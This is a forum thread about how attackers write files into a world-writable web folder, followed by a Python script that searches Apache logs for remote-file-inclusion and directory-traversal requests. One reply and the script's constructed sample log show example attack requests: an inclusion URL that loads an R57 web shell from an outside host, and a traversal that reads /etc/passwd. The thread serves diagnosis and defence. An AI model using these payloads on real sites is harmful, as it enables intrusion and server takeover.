How can someone upload to a folder that is chmod 777 without having a username and password to your server or FTP? This recently happened to me. In order to secure against it entirely, I was looking to find out in detail how it's done so that I can set up ways to block it from happening again. Thanks in advance, TJ
There are still about a thousand ways this could happen. A good clue is to look at who owns the file. If it's owned by the same user that runs Apache (often something like www-data or nobody), then the chances are good that it's a security vulnerability in your web server / web application setup. If you are running PHP, that's the first thing I would target. PHP has made it very easy to code certain kinds of security vulnerabilities, in the same way that C++ made buffer overflows hard to avoid. The two I'm thinking of right now are directory traversal and remote file inclusion.

Another good clue can be found from the timestamp on the file. Look through all your logs for events that happened at the same time or just before it. Apache logs will tell you which script has the vulnerability, FTP/user auth logs will tell you which user account was compromised, and syslog might be able to tell you if it was a buffer overflow in another service you are running on that box.

If you have written anything in PHP yourself, it would be worth going over it again with a fine-toothed comb. If you have some other software like WordPress, it would be worth checking that it's updated to the most recent version.

If the file is owned by someone else, not the Apache user, then the chances are better that either that user is secretly malicious and put that file there using their own account, or (more likely) that their password was stolen through some other method unrelated to your server. Check your user auth logs for failed login attempts and logins from unusual IP addresses. Good luck.
CHMOD 777 is not recommended, as if users are allowed to upload anything, even a newbie can in that case upload a shell or similar to your server. CHMOD files 755 and be safe.
Thank you for your wise response. I knew that and know that. However, a client of mine didn't, and for that I have secured his site. However, I wanted to know how it is done remotely to someone's server folder which is set to 777, to see other possible ways to secure against the same problem.
When there is a specific LFI or RFI vulnerability in one of your hosted sites, an attacker can easily place a shell like R57, i.e.: exploitedsite.org/index.php?name=http://shell.com/r57.txt? In this example, the attacker found a parsing error allowing remote file inclusion and execution on the index.php file when it calls for, say, PageB.php. Now that the attacker has their evil script attached, the shell has a built-in FTP-like feature and they can easily manipulate folders and files that are all writable, executable and viewable globally. I hope that helps you understand a little.
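The two answers above describe one investigation: check who owns the unexpected file, take its timestamp, and search the Apache log around that time for the request that planted it (the `?name=http://...` remote-inclusion pattern from the last reply, or a `../` traversal). The script below is an added example written for this thread, not code from any of the posters. It assumes Apache's combined log format, a window of one hour before to five minutes after the file's modification time (an arbitrary choice), and uses constructed sample log lines and a constructed timestamp; the command-line file and log paths are hypothetical.

```python
import os
import re
import sys
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample Apache combined-format lines (not taken from the thread).
SAMPLE_LOG = """\
203.0.113.5 - - [12/Mar/2012:10:14:02 +0000] "GET /index.php?name=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Mar/2012:10:15:41 +0000] "GET /index.php?name=http://example.net/r57.txt? HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Mar/2012:10:15:43 +0000] "GET /view.php?page=../../../../etc/passwd HTTP/1.1" 200 1844 "-" "curl/7.21"
192.0.2.77 - - [12/Mar/2012:13:02:10 +0000] "GET /index.php?name=contact HTTP/1.1" 200 498 "-" "Mozilla/5.0"
"""
# Constructed mtime of the unexpected file, a minute after the suspicious requests.
SAMPLE_MTIME = datetime(2012, 3, 12, 10, 16, 30, tzinfo=timezone.utc)

# Accounts a web server commonly runs as (thread mentions www-data and nobody).
WEB_SERVER_USERS = {"www-data", "apache", "httpd", "nobody"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
URL_SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)   # value is a remote URL -> RFI
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")                   # a ".." path segment -> traversal


def owned_by_web_server(owner):
    """True when the file owner is a typical web-server account, pointing at a web-app bug."""
    return owner in WEB_SERVER_USERS


def describe_file(path):
    """Owner name and UTC modification time of the file found in the writable directory."""
    import pwd  # Unix only
    st = os.stat(path)
    return pwd.getpwuid(st.st_uid).pw_name, datetime.fromtimestamp(st.st_mtime, tz=timezone.utc)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def classify_request(target):
    """Indicators found in a request target: 'rfi:<param>' or 'traversal:<param|path>'."""
    parts = urlsplit(target)
    findings = []
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        value = unquote(value)  # decode once more to catch double-encoded values
        if URL_SCHEME_RE.match(value):
            findings.append(f"rfi:{key}")
        if TRAVERSAL_RE.search(value):
            findings.append(f"traversal:{key}")
    if TRAVERSAL_RE.search(unquote(parts.path)):
        findings.append("traversal:path")
    return findings


def suspicious_requests_near(log_text, file_mtime, before=timedelta(hours=1), after=timedelta(minutes=5)):
    """Requests inside [mtime - before, mtime + after] carrying RFI or traversal indicators,
    sorted by time, as (timestamp, client ip, target, indicators) tuples."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not (file_mtime - before <= rec["ts"] <= file_mtime + after):
            continue
        indicators = classify_request(rec["target"])
        if indicators:
            hits.append((rec["ts"], rec["ip"], rec["target"], indicators))
    hits.sort()
    return hits


if __name__ == "__main__":
    if len(sys.argv) == 3:
        # e.g. python3 find_upload_source.py /var/www/uploads/unknown.php /var/log/apache2/access.log
        owner, mtime = describe_file(sys.argv[1])
        with open(sys.argv[2], errors="replace") as fh:
            log_text = fh.read()
    else:
        owner, mtime, log_text = "www-data", SAMPLE_MTIME, SAMPLE_LOG
    print(f"owner={owner} web-server-account={owned_by_web_server(owner)} mtime={mtime.isoformat()}")
    for ts, ip, target, indicators in suspicious_requests_near(log_text, mtime):
        print(ts.isoformat(), ip, target, ",".join(indicators))
```

Run with no arguments it works over the constructed sample and reports the two requests just before the file appeared; with a file path and a log path it does the same against a real log. Each hit names the script and parameter involved, which is the "which script has the vulnerability" answer the second post is after; the owner check tells you whether to look at the web application at all or at a compromised user account instead.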